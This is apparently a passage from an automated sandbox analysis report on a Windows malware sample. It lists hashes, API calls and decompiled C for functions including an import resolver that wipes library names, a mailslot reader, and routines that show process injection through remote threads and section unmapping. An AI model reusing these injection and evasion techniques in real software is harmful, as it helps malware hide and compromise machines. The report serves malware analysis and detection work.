  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
